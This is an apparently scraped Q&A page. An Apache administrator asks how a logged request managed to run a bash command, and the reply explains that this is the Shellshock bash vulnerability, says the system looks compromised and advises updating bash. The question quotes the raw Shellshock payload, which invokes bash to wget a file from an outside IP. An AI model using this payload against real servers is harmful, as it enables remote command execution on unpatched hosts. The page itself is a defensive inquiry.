How can one prevent Apache executing the request line as a bash command?

I'm running several virtual hosts on Apache 2.2.22 and just noticed a rather alarming incident in the logs where a "security scanner" from Iceland was able to wget a file into a cgi-bin directory with the following http request line:

() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\"

It effectively downloaded the file in question. Could any one explain how this request manages to actually execute the bash command ?

Naturally, the cgi-bin shouldn't be writable, but it would still be helpful to understand how this type of exploit functions and if there isn't some way to change the Apache configuration parameters so that request commands are never executed ...

This may be unrelated, but several hours later, there has begun a stream of strange requests from the internal interface, occurring every 2 seconds:

host:    ":443"   request:  "NICK netply"    source ip: 127.0.0.1

Answers


This is a vulnerability in bash which is exposed via Apache referred to as the "Shellshock" or "bash bug" and allows an attacker to execute arbitrary commands both locally and remotely making it a very serious vulnerability.

You need to update bash, but you are showing signs of an already compromised system. For more information on shellshock including detection and fixing, see:

digitalocean.com

shellshocker.net


Need Your Help

Cannot get .ajax to call my php script

php jquery

for the life of me I cannot get my PHP file to be called using the ajax function. Here is my relevant HTML:

About UNIX Resources Network

Original, collect and organize Developers related documents, information and materials, contains jQuery, Html, CSS, MySQL, .NET, ASP.NET, SQL, objective-c, iPhone, Ruby on Rails, C, SQL Server, Ruby, Arrays, Regex, ASP.NET MVC, WPF, XML, Ajax, DataBase, and so on.